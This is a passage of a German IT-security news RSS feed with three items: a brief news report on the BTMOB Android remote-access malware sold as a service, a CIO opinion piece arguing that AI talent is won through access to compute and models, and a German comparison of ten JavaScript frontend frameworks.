<link>https://tsecurity.de/de/3551853/it-security-nachrichten/new-btmob-malware-lets-attackers-remotely-control-android-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551853/it-security-nachrichten/new-btmob-malware-lets-attackers-remotely-control-android-devices/</guid>
<pubDate>Wed, 27 May 2026 18:38:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New Android malware dubbed BTMOB is arming even low-skilled attackers with full remote control over infected phones by combining a powerful RAT engine with a no-code campaign builder toolkit. The threat, first seen in 2025, is now evolving rapidly through…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/new-btmob-malware-lets-attackers-remotely-control-android-devices/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/new-btmob-malware-lets-attackers-remotely-control-android-devices/">New BTMOB Malware Lets Attackers Remotely Control Android Devices</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New BTMOB Malware Lets Attackers Remotely Control Android Devices]]></title>
<description><![CDATA[New Android malware dubbed BTMOB is arming even low-skilled attackers with full remote control over infected phones by combining a powerful RAT engine with a no-code campaign builder toolkit. The threat, first seen in 2025, is now evolving rapidly through a malware-as-a-service (MaaS) model and a...]]></description>
<link>https://tsecurity.de/de/3551578/it-security-nachrichten/new-btmob-malware-lets-attackers-remotely-control-android-devices/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551578/it-security-nachrichten/new-btmob-malware-lets-attackers-remotely-control-android-devices/</guid>
<pubDate>Wed, 27 May 2026 17:08:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New Android malware dubbed BTMOB is arming even low-skilled attackers with full remote control over infected phones by combining a powerful RAT engine with a no-code campaign builder toolkit. The threat, first seen in 2025, is now evolving rapidly through a malware-as-a-service (MaaS) model and active phishing campaigns worldwide. BTMOB is an Android remote access […]</p>
<p>The post <a href="https://cybersecuritynews.com/btmob-malware-control-android-devices/">New BTMOB Malware Lets Attackers Remotely Control Android Devices</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI talent problem CIOs cannot delegate to HR]]></title>
<description><![CDATA[As enterprises accelerate AI adoption, many CIOs remain focused on platforms, governance and scale. But the real competitive risk may be elsewhere. Top AI talent is increasingly choosing employers not only for pay but also for access to compute, freedom to experiment and the ability to operate at...]]></description>
<link>https://tsecurity.de/de/3550970/it-security-nachrichten/the-ai-talent-problem-cios-cannot-delegate-to-hr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550970/it-security-nachrichten/the-ai-talent-problem-cios-cannot-delegate-to-hr/</guid>
<pubDate>Wed, 27 May 2026 14:08:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As enterprises accelerate AI adoption, many CIOs remain focused on platforms, governance and scale. But the real competitive risk may be elsewhere. Top AI talent is increasingly choosing employers not only for pay but also for access to compute, freedom to experiment and the ability to operate at full leverage. If HR and leadership teams fail to understand that shift, organizations may lose their best builders before the problem is even visible.</p>



<h2 class="wp-block-heading">The silent talent drain in AI: Why CIOs must rethink recruitment before HR falls behind</h2>



<p>Most CIOs still frame the AI race as a contest over platforms, models, governance, security and deployment speed. That is understandable. Those are the visible levers. They show up in board packs, transformation plans, vendor briefings and budget requests. But a more consequential battle is now emerging underneath that surface. The next decisive advantage in AI will not come only from who buys the best tools. It will come from who attracts, enables and retains the small pool of talent capable of converting those tools into outsized business value.</p>



<p>That is where many enterprises are exposed, often without realising it.</p>



<p>The market for top AI talent is changing faster than most corporate talent systems. ManpowerGroup’s 2025 global research confirms that <a href="https://www.manpowergroup.com/en/news-releases/news/global-talent-shortage-reaches-turning-point-as-ai-skills-claim-top-spot" target="_blank" rel="nofollow">AI skills now top the talent</a>, while enterprise AI adoption is shifting from experimentation to scaled activation. That combination is increasing demand for people who can build, integrate, govern and operationalize AI at speed. The shortage is no longer abstract. It is already shaping compensation, hiring strategies and employer positioning.</p>



<p>The problem, and this is something I see repeatedly in my own advisory work, is that many CIOs are investing in AI infrastructure while still operating with a pre-AI model of talent. They are modernising data estates, deploying copilots, building policy guardrails and signing enterprise contracts, yet they are not redesigning the conditions under which high-leverage AI talent chooses to work. That is the blind spot. In the AI era, capability is no longer defined only by human skill. It is increasingly defined by the degree of access an organization gives to that skill. Access to frontier models. Access to compute. Access to experimentation. Access to tools without institutional drag.</p>



<h2 class="wp-block-heading">The new talent currency is not just pay. It’s leverage</h2>



<p>That shift matters because the economics of productivity are changing. In a traditional enterprise environment, output scaled relatively predictably with team size, process discipline and management quality. AI changes that. Recent empirical research, including a <a href="https://www.stlouisfed.org/on-the-economy/2025/feb/impact-generative-ai-work-productivity" target="_blank" rel="nofollow">St. Louis Federal Reserve analysis</a>, shows that one exceptional engineer, data scientist or product builder with the right tooling can now produce value that would previously have required a team. This makes leverage, not effort alone, the core variable. And leverage is determined largely by the environment the organization creates.</p>



<p>This is where the emerging conversation around AI tokens becomes strategically important. The point is not simply whether companies literally compensate employees with tokens. The more important issue is what tokens represent. They represent capacity. They represent the right to use computing, models, and AI systems at a level that meaningfully amplifies human output. In effect, AI capacity is becoming part of the employee value proposition.</p>



<p>Top AI talent is not only asking about the salary. They are increasingly asking: What will I be able to do here? How fast can I test ideas? Will advanced models be available or tightly rationed? Is computing treated as productive capital or as a cost to be restricted? Will I spend my time building or seeking approvals? That is a fundamental shift in how elite technical talent evaluates employers. The old logic of compensation, title and brand prestige is weakening as a sole mechanism for attraction. For the best AI practitioners, leverage is becoming the real differentiator. As TechTarget’s coverage of the <a href="https://www.techtarget.com/searchcio/feature/The-AI-talent-wars-explained-What-CIOs-need-to-know" target="_blank" rel="nofollow">AI talent wars facing CIOs</a> makes clear, this is not a future problem it is a current one.</p>



<h2 class="wp-block-heading">Your AI strategy may be strong. Your talent model may be broken</h2>



<p>Many enterprises are not prepared for this change. Their HR systems still revolve around fixed salary bands, annual bonus structures, standardized job architecture and conventional notions of fairness. Those mechanisms made sense in a world where productivity differences were meaningful but still bounded. AI changes that distribution. Output is becoming more uneven, more non-linear and more sensitive to tooling and access. Two people with similar titles may generate radically different business value depending on the AI environment around them. If the talent model does not reflect that reality, the organization risks flattening its own advantage. This is why CIOs need to treat AI recruitment and retention as an operating model issue, not just an HR issue. If HR does not understand the strategic meaning of compute access, token budgets, frontier tooling and experimentation freedom, then top talent will slip away before formal metrics ever reveal the problem. Candidates may decline offers because they sense low leverage. Existing employees may remain on the payroll but reduce discretionary effort because the environment does not allow them to work at full capacity. Innovation slows, not because the company lacks ambition, but because it has built friction into the very layer where disproportionate value should emerge.</p>



<p>The danger is that this attrition is often silent. It does not always begin with resignations. It begins with smaller signals. Less experimentation. Fewer prototypes. More time spent navigating the process. A slow shift from creative momentum to compliance behaviour. Eventually, strong people leave for environments where their capabilities compound faster. We have seen this play out already as <a href="https://www.techtarget.com/searchcio/feature/How-big-tech-AI-talent-poaching-affects-the-AI-talent-wars" target="_blank" rel="nofollow">big tech firms aggressively poaching AI talent,</a>, leaving mid-market and large enterprises with shrinking candidate pools. Leadership then explains the loss in familiar terms, perhaps compensation, culture or career progression, without recognising that the deeper issue was constrained leverage.</p>



<h2 class="wp-block-heading">If HR doesn’t learn this fast, the market will teach it harshly</h2>



<p>This is already becoming a strategic management question for CIOs. Many companies are talking about AI transformation at the top without fully translating what it means for the people expected to drive it day-to-day. That gap matters. A company can claim to be ambitious in AI while still making it unnecessarily difficult for its best people to perform at the level they know is possible.</p>



<p>So, what should CIOs do?</p>



<ul class="wp-block-list">
<li><strong>Reframe computing as strategic capital.</strong> In the hands of high-leverage talent, compute is not just an operating expense. It is a multiplier of productivity, innovation velocity and learning speed. Treating it purely as a cost line risk starving the very people most capable of generating returns from it.</li>



<li><strong>Drive closer alignment among HR, finance and technology leadership.</strong> HR must recognize that access to AI tools is no longer merely a provisioning matter. It is part of the talent proposition. Finance must recognize that disciplined enablement can create far more value than indiscriminate restriction. Technology leaders must design governance models that support responsible speed, not just control. As CIO.com reports, CIOs will begin co-leading, and those who move first will have a structural advantage.</li>



<li><strong>Evolve recruitment narratives.</strong> The old employer story of salary, benefits and career path is no longer sufficient for top AI candidates. The new story is about capability. What models will they have access to? What sandbox can they use? How much experimentation budget exists? How quickly can they move from concept to deployment? In the AI era, the strongest candidates are choosing environments rather than just employers.</li>



<li><strong>Revisit how performance is evaluated.</strong> It is no longer enough to measure output using conventional management proxies alone. In AI-heavy roles, leaders will increasingly need to understand the relationship between talent, tooling, compute and business outcomes. The question is not simply who worked harder. It is the one who created more value through augmented capability.</li>
</ul>



<p>None of this means abandoning governance, fairness or cost discipline. It means modernising them. The CIO challenge is not to create an unrestricted AI playground. It is to build a system that enables the right people to move quickly within sensible boundaries. That distinction matters. The winners in this market will not be the firms that ignore risk. They will be the firms that design for responsible leverage. As a recent <a href="https://globalcio.com/articles/main/key-challenges-for-cios-in-2026-strategy-governance-and-ai-at-scale/" target="_blank" rel="nofollow">GlobalCIO roundtable concluded</a>, AI at scale is an organizational and operational challenge, not just a technical one.</p>



<p>The deeper provocation for CIOs is this: Are you building an AI-enabled enterprise, or a permission-constrained one? Those are not the same thing. One attracts builders. The other gradually exhausts them. The next stage of the AI race will not be won only through technology choices. It will be won through organizational design. CIOs who recognize this early will help build environments where exceptional people can produce exceptional results. Those who do not may keep investing heavily in AI while quietly losing the people best positioned to make that investment matter.</p>



<p>That is the talent risk many enterprises still do not see. The next AI winner will not be the firm that buys the most tools. It will be the one that lets exceptional people use them at full power.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten JavaScript-Frameworks im Vergleich]]></title>
<description><![CDATA[Ein (passendes) JavaScript-Framework auszuwählen, ist ein bisschen wie Schuhe kaufen: Mit Blick auf das Gesamtangebot gibt es alles, was sich Softwareentwickler wünschen – nur nicht kombiniert in einem Modell.
					Foto: RossHelen | shutterstock.com




Den (richtigen) Technologie-Stack auszuwähl...]]></description>
<link>https://tsecurity.de/de/3549678/it-security-nachrichten/die-besten-javascript-frameworks-im-vergleich/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549678/it-security-nachrichten/die-besten-javascript-frameworks-im-vergleich/</guid>
<pubDate>Wed, 27 May 2026 05:36:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" alt="Ein (passendes) JavaScript-Framework auszuwählen, ist ein bisschen wie Schuhe kaufen: Mit Blick auf das Gesamtangebot gibt es alles, was sich Softwareentwickler wünschen - nur nicht kombiniert in einem Modell." title="Ein (passendes) JavaScript-Framework auszuwählen, ist ein bisschen wie Schuhe kaufen: Mit Blick auf das Gesamtangebot gibt es alles, was sich Softwareentwickler wünschen - nur nicht kombiniert in einem Modell." src="https://images.computerwoche.de/bdb/3392180/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Ein (passendes) JavaScript-Framework auszuwählen, ist ein bisschen wie Schuhe kaufen: Mit Blick auf das Gesamtangebot gibt es alles, was sich Softwareentwickler wünschen – nur nicht kombiniert in einem Modell.</p></figcaption></figure><p class="imageCredit">
					Foto: RossHelen | shutterstock.com</p></div>




<p>Den (richtigen) Technologie-Stack auszuwählen, ist eine der diffizilsten Herausforderungen in Sachen <a href="https://www.computerwoche.de/article/2818958/was-developer-an-ihrem-job-lieben-und-hassen.html" title="Softwareentwicklung" target="_blank">Softwareentwicklung</a>: Ohne Framework kein Development – allerdings zeigen sich die wahren Stärken und Schwächen eines Rahmenwerks erst in der Praxis. Für Developer eine Zwickmühle, aus der auch <a href="https://www.computerwoche.de/article/2785190/prototyping-hilft-bei-der-softwareentwicklung.html" title="Prototyping" target="_blank">Prototyping</a> nur bedingt befreien kann. Schließlich besteht die allgemeine Tendenz dazu, Technologien zu vertrauen, die sich in der Vergangenheit bewährt haben. So können allerdings auch innovative Entwicklungen durch die Lappen gehen. Das ist speziell mit Blick auf den Bereich der <a href="https://www.computerwoche.de/article/2821289/7-javascript-projekte-die-sie-kennen-sollten.html" title="JavaScript-Frameworks" target="_blank">JavaScript-Frameworks</a> wahrscheinlich, da deren Entwicklung besonders rasant voranschreitet. Dass qualitativ hochwertige Rahmenwerke im Überfluß zur Verfügung stehen, macht die Sache nicht besser.</p>



<p>In diesem Artikel werfen wir einen Blick auf die führenden JavaScript-(Frontend-)Frameworks und vergleichen diese auf Feature-Ebene miteinander. Folgende Frameworks werden dabei behandelt:</p>



<ul class="wp-block-list">
<li><p>React</p></li>



<li><p>Vue</p></li>



<li><p>Angular</p></li>



<li><p>Preact</p></li>



<li><p>Lit</p></li>



<li><p>Svelte</p></li>



<li><p>AlpineJS</p></li>



<li><p>SolidJS</p></li>



<li><p>HTMX</p></li>



<li><p>Qwik</p></li>
</ul>



<p>Es gibt diverse Möglichkeiten, sich der Entscheidung über ein JavaScript-<a href="https://www.computerwoche.de/article/2824968/3-wege-zum-vorzeige-frontend.html" title="Frontend-Framework" target="_blank">Frontend-Framework</a> anzunähern. Ein Faktor, den Sie dabei fokussieren sollten, ist Vertrautheit: Wenn Sie und Ihr Team mit einer bestimmten Technologie wirklich vertraut sind, sollten gute Gründe vorliegen, um davon abzuweichen. Diesbezüglich könnten folgende Fragen relevant sein:</p>



<ul class="wp-block-list">
<li><p>Entspricht die Technologie nicht mehr den Anforderungen des Projekts?</p></li>



<li><p>Besteht die Gefahr, dass das von Ihnen verwendete Framework eingestellt wird?</p></li>



<li><p>Sind interessante Funktionalitäten nicht existent?</p></li>
</ul>



<p>Wenn Sie alle Fragen mit ‘nein’ beantworten können, sollten Sie sich lieber zweimal überlegen, auf ein neues Framework umzusteigen. Dennoch ist es allgemein von Vorteil, neuen Frameworks offen gegenüberzustehen, die projektspezifische Benefits in den Bereichen <a href="https://www.computerwoche.de/article/2821891/8-wege-um-top-entwickler-zu-halten.html" title="Developer Experience" target="_blank">Developer Experience</a>, <a href="https://www.computerwoche.de/article/2814007/wie-devops-die-app-performance-treibt.html" title="Performance" target="_blank">Performance</a> oder Community Support realisieren können. Dazu kommt, dass <a href="https://www.computerwoche.de/article/2794625/was-javascript-von-typescript-unterscheidet.html" title="JavaScript" target="_blank">JavaScript</a> und speziell Frontend-Frameworks miteinander interagieren und sich gegenseitig stark beeinflussen. Sich mit einem Rahmenwerk zu befassen, kann deswegen oft zu synergetischen Insights führen. Anders ausgedrückt: Ein Frontend-Framework-Deepdive kann niemals schaden.</p>



<h2 class="wp-block-heading">Die 10 wichtigsten JavaScript-Frameworks</h2>



<p>Um einen Überblick über die führenden reaktiven Frameworks zu bekommen, werfen wir einen Blick auf die populärsten Abkömmlinge. Diese haben wir auf Grundlage ihrer jeweiligen Download-Zahlen auf dem <a href="https://www.npmjs.com/" title="Open Source Repository NPM" target="_blank" rel="noopener">Open Source Repository NPM</a> ermittelt. Ein Klick auf den Link führt Sie zur jeweiligen NPM-Download-Seite inklusive der aktuellen Statistiken.</p>



<ol class="wp-block-list">
<li><p><a title="React" href="https://www.npmjs.com/package/react" target="_blank" rel="noopener">React</a></p></li>



<li><p><a title="Vue / Vue 3" href="https://www.npmjs.com/package/vue" target="_blank" rel="noopener">Vue / Vue 3</a></p></li>



<li><p><a title="Angular (CLI)" href="https://www.npmjs.com/package/@angular/cli" target="_blank" rel="noopener">Angular (CLI)</a></p></li>



<li><p><a title="Preact" href="https://www.npmjs.com/package/preact" target="_blank" rel="noopener">Preact</a></p></li>



<li><p><a title="Lit" href="https://www.npmjs.com/package/lit" target="_blank" rel="noopener">Lit</a></p></li>



<li><p><a title="Svelte" href="https://www.npmjs.com/package/svelte" target="_blank" rel="noopener">Svelte</a></p></li>



<li><p><a title="AlpineJS" href="https://www.npmjs.com/package/alpinejs" target="_blank" rel="noopener">AlpineJS</a></p></li>



<li><p><a title="SolidJS" href="https://www.npmjs.com/package/solid-js" target="_blank" rel="noopener">SolidJS</a></p></li>



<li><p><a title="HTMX" href="https://www.npmjs.com/package/htmx.org" target="_blank" rel="noopener">HTMX</a></p></li>



<li><p><a title="Qwik" href="https://www.npmjs.com/package/@builder.io/qwik" target="_blank" rel="noopener">Qwik</a></p></li>
</ol>



<p>Obwohl Popularität kein besonders guter Indikator für Qualität ist, sagt sie doch viel darüber aus, wie es um die Verfügbarkeit von Developern steht, die mit dem Framework arbeiten können. Das könnte speziell für größere Teams und Projekte einen entscheidenden Faktor darstellen.</p>



<p>Zu beachten ist mit Blick auf die Top Ten, dass es sich bei allen “Kandidaten” um reine Frontend-Frameworks handelt. Einige dieser Projekte beinhalten auch ein <a href="https://www.computerwoche.de/article/2819343/darum-ist-full-stack-engineering-schaedlich.html" title="Fullstack" target="_blank">Fullstack</a>-Framework – etwa Next oder SvelteKit, was Backend-Funktionalitäten wie Server-seitiges Rendering ermöglicht. Das ist für einige Teams und Projekte unter Umständen ein weiterer bedeutender Auswahlfaktor in Sachen JavaScript-Framework. Im Folgenden ein detaillierter Blick auf die führenden reaktiven Frameworks. Ein Klick auf die Verlinkung im Titel führt Sie direkt zum jeweiligen GitHub Repository beziehungsweise der Projekt-Webseite.</p>



<p><strong><a href="https://github.com/facebook/react" title="React" target="_blank" rel="noopener">React</a></strong></p>



<p>Das Flaggschiff der reaktiven Frameworks ist im Jahr 2013 bei Facebook respektive Meta entstanden und wird bis heute vom Social-Media-Konzern verwaltet. Wie auch die Download-Zahlen von React zeigen, ist das Framework mit großem Abstand das populärste der hier vorgestellten – und quasi die Standardwahl unter den Frontend-Rahmenwerken. Trotz seines Alters wurde React kontinuierlich von Meta <a href="https://react.dev/blog/2024/02/15/react-labs-what-we-have-been-working-on-february-2024" title="auf dem aktuellen Stand gehalten" target="_blank" rel="noopener">auf dem aktuellen Stand gehalten</a>. Dabei könnte auch eine Rolle spielen, dass Facebook immer noch auf dem Framework aufbaut.</p>



<p>Das größte Argument gegen React: sein gewaltiger Umfang. Das kann den Einsatz beschwerlich gestalten, insbesondere wenn Sie an einem Projekt arbeiten, für das die meisten React-Features erst gar nicht nötig sind. Einige der nachfolgenden JavaScript-Frameworks sind nicht nur leichtgewichtiger, sondern bieten auch andere Ansätze.</p>



<p><strong><a href="https://github.com/vuejs/vue" title="Vue" target="_blank" rel="noopener">Vue</a></strong></p>



<p>Auch bei Vue handelt es sich um ein ausgereiftes Framework, das in Sachen Support gut aufgestellt ist. Im Vergleich zu React ist Vue deutlich leichtgewichtiger und schneidet auch bei Performance-Tests besser ab.</p>



<p>Vue steht in erster Linie im Ruf, eine moderate Lernkurve aufzuwerfen. Darüber hinaus kann das Framework mit einer ausgezeichneten Dokumentation und einer offenherzigen Community punkten. <a href="https://medium.com/@serpentarium13/why-i-chose-vue-over-react-b082d81315ab" title="Einige Entwickler" target="_blank" rel="noopener">Einige Entwickler</a> bevorzugen Vue auch wegen seines ausgeprägten Fokus auf die Developer Experience. Wenn Sie und Ihr Team gerne mit Vue arbeiten, kann das Framework langfristig dazu beitragen, die Benutzerfreundlichkeit und Mitarbeiterzufriedenheit zu erhöhen.</p>



<p>Von den “Big Three” unter den JavaScript-Frontend-Frameworks (React, Angular und Vue) ist Vue das basisorientierteste, was seinen Reiz haben kann.</p>



<p><strong><a href="https://github.com/angular/angular" title="Angular" target="_blank" rel="noopener">Angular</a></strong></p>



<p>Von allen hier gelisteten Frameworks bietet Angular die wohl ausgeprägteste All-in-One-Entwicklungserfahrung. Das Framework ist als durchgängige Lösung konzipiert, die verspricht, alles nötige in einem konsistenten Paket zu liefern. In der Vergangenheit galt Angular vor allem als komplex – sowohl in der Theorie als auch in der Praxis. Zudem war ein Hauch von Overengineering bei Angular zu verspüren – eine Entwicklung die in erster Linie dem Design geschuldet war.</p>



<p>Das hat sich inzwischen allerdings grundlegend geändert: Die Entwickler hinter dem Projekt haben das Framework (<a href="https://www.infoworld.com/article/2335505/the-best-new-features-in-angular-17-a-kinder-faster-angular.html" title="mit Version 17" target="_blank">mit Version 17</a>) in diversen Aspekten simplifiziert und die Entwicklererfahrung optimiert – zudem steht nun auch eine effektive Rendering-Engine für Server-seitige Tasks zur Verfügung. Darüber hinaus wurden auch die <a href="https://angular.io/docs" title="Dokumentation" target="_blank" rel="noopener">Dokumentation</a> und die <a href="https://angular.io/" title="offizielle Webseite" target="_blank" rel="noopener">offizielle Webseite</a> modernisiert.</p>



<p>Ein wesentlicher Unterschied zu React und Vue: Angular ist eher “rechthaberisch” – für die meisten Dinge gibt es klar definierte Vorgaben. Das kann es erschweren, mit Angular Applikationen anzupassen oder unkonventionelle Wege zu gehen. Ob das von Vor- oder von Nachteil ist, hängt im Wesentlichen von Ihrem persönlichen Programmierstil ab.</p>



<p><strong><a href="https://github.com/preactjs" title="Preact" target="_blank" rel="noopener">Preact</a></strong></p>



<p>Die Nomenklatur deutet es bereits an: Bei Preact handelt es sich um ein von React inspiriertes Framework – quasi eine abgespeckte Version desselbigen mit ähnlichen aber kleineren <a href="https://www.computerwoche.de/article/2790525/was-sie-ueber-application-programming-interfaces-wissen-muessen.html" title="APIs" target="_blank">APIs</a>. Einer <a href="https://preactjs.com/guide/v10/differences-to-react/#main-differences" title="der wesentlichen Unterschiede" target="_blank" rel="noopener">der wesentlichen Unterschiede</a> besteht dabei darin, dass Preact kein eigenes Eventing-System implementiert. Stattdessen nutzt es die in den Browser integrierten Event Listener. </p>



<p>Im Vergleich mit React entwickeln Sie mit Preact schneller und schlanker – dafür müssen Sie auf einige Funktionalitäten des “Originals” verzichten. Sie können Preact allerdings mit einem <a href="https://preactjs.com/guide/v10/switching-to-preact/" title="zusätzlichen Layer ausstatten" target="_blank" rel="noopener">zusätzlichen Layer ausstatten</a> und so nahezu vollständige React-Kompatibilität erreichen. Diverse Komponenten aus dem React-Ökosystem funktionieren dann auch mit Preact.</p>



<p>Wenn Sie auf kleinere APIs Wert legen, sich dabei aber weitgehend im React-Ökosystem bewegen möchten, ist dieses reaktive Framework möglicherweise eine gute Wahl.</p>



<p><strong><a href="https://github.com/lit/lit" title="Lit" target="_blank" rel="noopener">Lit</a></strong></p>



<p>Das Alleinstellungsmerkmal von Lit: Es nutzt den <a href="https://www.webcomponents.org/introduction" title="Web-Components-Standard" target="_blank" rel="noopener">Web-Components-Standard</a> als Grundlage. Das hat zur Folge, dass die API und das Bundle selbst sehr klein sind. Der Fokus liegt darauf, die integrierten Web Components zu unterstützen. Darüber hinaus fußt Lit auf einer minimalistischen Entwicklungsphilosophie, die Ihnen maximale Flexibilität ermöglicht: Es gibt nur wenige festgeschriebene Wege, um Dinge mit Lit zu erledigen.</p>



<p>Das Framework weist – gemessen an seiner Größe und Popularität – ein sehr umfangreiches Ökosystem auf.</p>



<p><strong><a href="https://github.com/sveltejs/svelte" title="Svelte" target="_blank" rel="noopener">Svelte</a></strong></p>



<p>Dieses reaktive Framework zeichnet sich in erster Linie dadurch aus, dass es einen Compiler zum Einsatz bringt. Der transformiert die Svelte-Syntax in ein kleines und performantes JavaScript-Bundle. Das ermöglicht dem Framework, einige Optimierungen bereits im Vorfeld vorzunehmen – und mit interessanten Syntax-Elementen <a href="https://www.infoworld.com/article/2336000/reactive-magic-in-svelte-5-understanding-runes.html" title="zu experimentieren" target="_blank">zu experimentieren</a>.</p>



<p>Mit Blick auf die “Big Three” ist Svelte am ehesten mit Vue vergleichbar, weil es sich gut für unabhängige Experimente eignet. Die Dokumentation von Vue ist gut ausgestaltet und das Framework erfreut sich in der <a href="https://www.computerwoche.de/k/linux-open-source,3472" target="_blank" class="idgGlossaryLink">Open-Source</a>-Community wachsender Beliebtheit.</p>



<p><strong><a href="https://alpinejs.dev/" title="AlpineJS" target="_blank" rel="noopener">AlpineJS</a></strong></p>



<p>Von allen hier vorgestellten Frameworks ist AlpineJS das <a href="https://alpinejs.dev/" title="utilitaristischste" target="_blank" rel="noopener">utilitaristischste</a>. Es bietet eine kompakte Reactive-Bibliothek – das war’s. Trotz seines überschaubaren Footprints steckt in diesem reaktiven Framework jedoch eine ganze Menge Power. </p>



<p>Wie HTMX (dazu später) will auch AlpineJS Komplexität beseitigen, dabei jedoch die Grundlagen moderner Frontend-Funktionalität gewährleisten. Um diese Funktionalität “auf die Straße zu bringen”, nutzt das JavaScript-Framework spezielle HTML-Eigenschaften.</p>



<p><strong><a href="https://github.com/solidjs" title="SolidJS" target="_blank" rel="noopener">SolidJS</a></strong></p>



<p>Im Vergleich zu den anderen hier gelisteten JavaScript-Frontend-Frameworks ist Solid ein Vertreter der jüngeren Generation. Nichtsdestotrotz konnte SolidJS bereits (im positiven Sinn) für Furore sorgen und erfreut sich einer wachsenden Nutzerbasis.</p>



<p>Das Framework fußt auf Signals (Reactive Primitives), die ihm <a href="https://www.solidjs.com/docs/latest" title="eine flexible Grundlage verschaffen" target="_blank" rel="noopener">eine flexible Grundlage verschaffen</a>. Um die Funktionalität zu erweitern, können sowohl das Framework selbst als auch der Anwender-Code auf dieselben Features zugreifen. In Sachen Performance-Tests schneidet SolidJS gut ab.</p>



<p><strong><a href="https://github.com/bigskysoftware/htmx" title="HTMX" target="_blank" rel="noopener">HTMX</a></strong></p>



<p>Einen völlig anderen Ansatz, um Web-Frontends zu entwickeln, wirft <a href="https://www.computerwoche.de/article/2833138/dynamisches-html-ohne-javascript.html" title="HTMX" target="_blank">HTMX</a> auf: Es versucht, so viel Komplexität wie möglich zu eliminieren, REST wie beabsichtigt einzusetzen und “reines” HTML (mit einigen grundlegenden Verbesserungen) zu nutzen, um modernen Anforderungen wie AJAX- und DOM-Interaktionen <a href="https://www.computerwoche.de/article/2833120/software-ist-eine-brutale-branche.html" title="gerecht zu werden" target="_blank">gerecht zu werden</a>.</p>



<p>HTMX kann eine lohnende Option sein, wenn Sie auf Dinge wie Server-seitiges Rendering verzichten können. Einer der größten Pluspunkte des Frameworks: Es ist relativ einfach zu erlernen. Wir können nur empfehlen, sich zumindest mit diesem Projekt zu beschäftigen – und sei es nur wegen der zugrundeliegenden Idee.</p>



<p><strong><a href="https://github.com/BuilderIO/qwik" title="Qwik" target="_blank" rel="noopener">Qwik</a></strong></p>



<p>Unter der Haube ist Qwik eine exotische Implementierung, die die Performance in den Mittelpunkt rückt. Das Framework zerlegt Applikationen in unterscheidbare Elemente und orientiert sich dabei an “Grenzen” wie Eventing oder Komponenten – entlang derer aggressives <a href="https://www.computerwoche.de/article/2804239/darauf-kommt-es-an.html" title="Lazy Loading" target="_blank">Lazy Loading</a> zum Einsatz kommt. Das Ergebnis: schnelleres Rendering.</p>



<h2 class="wp-block-heading">Reactive Frameworks im (Feature-)Vergleich</h2>



<p>Nachdem Sie die zehn wichtigsten Reactive-Framework-Optionen kennengelernt haben, geht es nun darum, die wichtigsten Funktionen und Merkmale miteinander zu vergleichen. Zunächst haben wir die reaktiven Rahmenwerke noch einmal in einer Übersicht zusammengetragen, die auf einen Blick Auskunft über die jeweiligen Lernkurven und Funktions-Highlights gibt.</p>



<figure class="wp-block-table stats legacyTable"><div class="overflow-table-wrapper"><table class="has-fixed-layout"><tbody><tr><td><p><strong>Framework</strong></p></td><td><p><strong>Lernkurve</strong></p></td><td><p><strong>Highlights</strong></p></td></tr><tr><td><p><strong>React</strong></p></td><td><p>moderat bis steil</p></td><td><p>konservativste Option; riesiges Ökosystem und Community; Balance zwischen Innovation und Stabilität;</p></td></tr><tr><td><p><strong>Vue</strong></p></td><td><p>moderat</p></td><td><p>leicht zu erlernen und einzusetzen; ein etabliertes Framework das weniger “corporate” ist;</p></td></tr><tr><td><p><strong>Angular</strong></p></td><td><p>steil</p></td><td><p>ein robustes Framework für große Projekte; Enterprise-orientiert; integrierter All-in-One-Ansatz;</p></td></tr><tr><td><p><strong>Preact</strong></p></td><td><p>moderat</p></td><td><p>React-ähnlich mit schnelleren Ladezeiten; insbesondere für Mobile Development empfehlenswert;</p></td></tr><tr><td><p><strong>Lit</strong></p></td><td><p>moderat</p></td><td><p>leichtgewichtig und performant mit Fokus auf Standards; leichter mit beispielsweise HTML kombinierbar; </p></td></tr><tr><td><p><strong>Svelte</strong></p></td><td><p>moderat</p></td><td><p>kleinerer Memory-Footprint; fokussiert die Entwicklererfahrung und Innovationen;</p></td></tr><tr><td><p><strong>Alpine</strong></p></td><td><p>flach</p></td><td><p>leichtgewichtiges Toolset; einfach zu erlernen und beherrschen; gut geeignet für kleinere bis mittelgroße Projekte;</p></td></tr><tr><td><p><strong>SolidJS</strong></p></td><td><p>moderat bis steil</p></td><td><p>reaktiver Kern auf Signals-Basis; Performance-orientiert;</p></td></tr><tr><td><p><strong>HTMX</strong></p></td><td><p>flach</p></td><td><p>einfach zu erlernen und zu integrieren; einzigartige, vereinfachte REST-Architektur;</p></td></tr><tr><td><p><strong>Qwik</strong></p></td><td><p>steil</p></td><td><p>innovativ und Performance-orientiert; integriert mit 